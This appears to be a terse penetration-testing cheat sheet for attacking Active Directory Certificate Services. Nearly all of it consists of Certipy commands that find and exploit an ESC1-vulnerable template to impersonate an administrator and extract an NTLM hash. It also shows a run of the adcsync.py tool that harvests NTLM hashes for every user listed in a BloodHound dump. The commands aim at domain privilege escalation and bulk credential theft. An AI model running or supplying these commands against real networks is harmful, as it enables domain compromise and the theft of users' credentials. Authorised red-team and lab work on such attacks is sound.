# find a vulnerable template$ certipy find -u username -p password target-ip ip# import into bloodhound# look at _Certipy.txt - check if there's an ESC1 vulnerability# exploit ESC1$ certipy req -u[email protected] -p password -ca TargetCA -target WIN-2016-FS.hacklab.com -template ESC1 -upn[email protected] -dc-ip ip# take administrator.pfx and create a hash$ certipy auth -pfx adminsitrator.pfx -dc-ip ip# note NTLM hash!
usage (with adcsync)
performs the same in an automated way to emulate adcsync
# create a bloodhound dump, extract user-data and get _users.json# fix users.json: convert from utf8 to ascii$ iconv -f utf-8 -t ascii//TRANSLIT user1.json user.json$ python adcsync.py -u user -p password -ca CA -template ESC1 -target ip -f users.json -o ntlm.txt